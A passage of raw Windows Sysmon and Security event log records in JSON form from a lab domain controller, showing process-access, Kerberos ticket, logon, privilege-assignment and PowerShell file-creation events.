C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.218","SourceProcessGUID":"{A837DB8D-01DE-5F25-0000-0010446C0400}","SourceProcessId":"4344","SourceThreadId":"4364","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01DE-5F25-0000-0010C47A0400}","TargetProcessId":"4444","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2524,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.234\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.234","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220355,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220356,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{D65C3B12-F0AD-F3F8-A7DB-D3AB603729DE}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{D65C3B12-F0AD-F3F8-A7DB-D3AB603729DE}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220357,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{D65C3B12-F0AD-F3F8-A7DB-D3AB603729DE}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{D65C3B12-F0AD-F3F8-A7DB-D3AB603729DE}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220358,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x48096\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{D65C3B12-F0AD-F3F8-A7DB-D3AB603729DE}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x48096","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{D65C3B12-F0AD-F3F8-A7DB-D3AB603729DE}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220359,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x48096\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x48096","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2525,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.234\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.234","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2526,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.234\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.234","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2527,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.250\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01DE-5F25-0000-0010C47A0400}\r\nTargetProcessId: 4444\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.250","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01DE-5F25-0000-0010C47A0400}","TargetProcessId":"4444","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":2528,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.265\r\nProcessGuid: {A837DB8D-01DE-5F25-0000-0010C47A0400}\r\nProcessId: 4444\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_5rsjydy1.uk3.ps1\r\nCreationUtcTime: 2020-08-01 05:47:10.265","Category":"File created (rule: 